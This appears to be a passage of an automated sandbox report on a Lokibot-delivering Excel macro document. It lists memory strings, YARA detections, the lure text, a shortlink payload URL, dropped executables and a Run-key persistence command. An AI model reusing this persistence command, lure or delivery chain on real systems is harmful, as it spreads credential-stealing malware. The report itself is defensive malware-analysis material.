Source: powershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000006.00000002.2107223409.000000001D360000.00000002.00000001.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp; String found in binary or memory: http://status.rapidssl.com0
Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.a-cert.at0E
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://www.acabogacia.org/doc0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://www.acabogacia.org0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.ancert.com/cps0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp; String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://www.certifikat.dk/repository0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmp; String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmp; String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://www.chambersign.org1
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://www.comsign.co.il/cps0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.crc.bg0
Source: powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmp; String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp; String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp; String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp; String found in binary or memory: http://www.disig.sk/ca0f
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://www.dnie.es/dpc0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.e-me.lv/repository0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmp; String found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://www.firmaprofesional.com0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.globaltrust.info0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.globaltrust.info0=
Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: RegAsm.exe; String found in binary or memory: http://www.ibsensoftware.com/
Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: powershell.exe, 00000008.00000002.2134654234.000000000024E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2134654234.000000000024E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                Source: powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                Source: powershell.exe, 00000006.00000002.2106986804.000000001D1E4000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
                Source: powershell.exe, 00000006.00000003.2094900131.000000001D1E4000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
                Source: powershell.exe, 00000006.00000003.2094900131.000000001D1E4000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                Source: powershell.exe, 00000006.00000003.2094858856.000000001D2AE000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
                Source: 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
                Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly
                Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/
                Source: powershell.exe, 00000006.00000002.2098023844.00000000001D0000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2099196904.0000000002BD1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2099216608.0000000002BFF000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/qjdJoz4
                Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/qjdJoz4PE
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-112763434-1
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165

                System Summary:

                Malicious sample detected (through community Yara rule)
                Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                Source: Document image extraction number: 0Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
                Source: Document image extraction number: 0Screenshot OCR: document is protected! To view this content, please click "Enable Editing" from the yellow bar and
                Source: Document image extraction number: 0Screenshot OCR: Enable Content"
                Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
                Source: Document image extraction number: 1Screenshot OCR: document is protected! To view this content, please click "Enable Editing" from the yellow bar and
                Source: Document image extraction number: 1Screenshot OCR: Enable Content"
                Found Excel 4.0 Macro with suspicious formulas
                Source: 6Cprm97UTl.xlsInitial sample: EXEC
                Found abnormal large hidden Excel 4.0 Macro sheet
                Source: 6Cprm97UTl.xlsInitial sample: Sheet size: 5194
                Found obfuscated Excel 4.0 Macro
                Source: 6Cprm97UTl.xlsInitial sample: High usage of CHAR() function: 16
                Powershell drops PE file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\12.exe
                Source: C:\Users\user\AppData\Local\Temp\12.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\12.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D5BC0 CreateProcessAsUserW,
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_003130D1
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00318D20
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_003169B0
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00318240
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00314EF1
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_0031D3B8
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_003197C2
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00313BC9
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00318D10
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_0031DEC8
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_0031D3A8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_005030D1
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050D090
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_005069B0
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050EBD0
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00503BC9
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00508D20
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00508520
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050F5B8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00504EF1
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_005097C2
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050D080
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00508D10
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D24E8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D2C18
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D0A28
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D4A20
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D7312
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D5490
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D24D8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D0A18
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D2C08
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D3D80
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D61C8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D41F8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D41E8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D7F40
                Source: C:\Users\user\ntrwe.exeCode function: 16_2_004930D1
                Source: C:\Users\user\ntrwe.exeCode function: 16_2_004969B0
                Source: C:\Users\user\ntrwe.exeCode function: 16_2_00494EF1
                Source: C:\Users\user\ntrwe.exeCode function: 16_2_00493BC9
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00253DFE
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_0040549C
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_004029D4
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_004030D1
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_0040D090
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_004069B0
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00403BC9
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00408515
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00408D20
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00404EF1
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_004097C2
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_0040D080
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_0040DBA0
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00408D10
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D40048
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D43818
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D45DA0
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D41D58
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D48640
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D40A30
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D43F48
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D474F8
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D450B0
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D40006
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D43808
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D46838
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D41D49
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D45517
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D45528
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D49270
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D43F39
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 19_2_01233DFE
                Source: 6Cprm97UTl.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RegAsm.exe 5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: String function: 00405B6F appears 42 times
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
                Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
